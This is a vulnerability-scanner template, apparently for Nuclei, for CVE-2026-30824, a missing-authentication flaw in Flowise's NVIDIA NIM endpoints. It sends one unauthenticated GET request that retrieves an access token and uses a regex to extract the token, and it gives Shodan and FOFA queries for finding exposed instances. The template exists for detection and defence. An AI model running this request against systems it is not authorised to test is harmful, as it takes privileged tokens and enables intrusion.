Flowise - NVIDIA NIM Endpoints Missing Authentication

id: CVE-2026-30824

info:
  name: Flowise - NVIDIA NIM Endpoints Missing Authentication
  author: DhiyaneshDk
  severity: high
  description: |
    Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
  impact: |
    Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise.
  remediation: This issue has been patched in version 3.0.13
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
    - https://nvd.nist.gov/vuln/detail/CVE-2026-30824
    - https://github.com/FlowiseAI/Flowise
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-30824
    epss-score: 0.07752
    epss-percentile: 0.91961
    cwe-id: CWE-306
  metadata:
    max-request: 2
    vendor: flowiseai
    product: flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/nvidia-nim/get-token"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'access_token','token_type')"
        condition: and

    extractors:
      - type: regex
        name: access_token
        group: 1
        regex:
          - '"access_token"\s*:\s*"([^"]+)"'
        part: body
# digest: 4a0a00473045022100d40e4d7ab8327d0473fe2664304c817f914cbc84bf140f27bb94f135f6a8960102202e2ace5486d6f90a0faaa87e1c4c999b80914022c85672f45a92929068891f7f:922c64590222798bb761d5b6d8e72950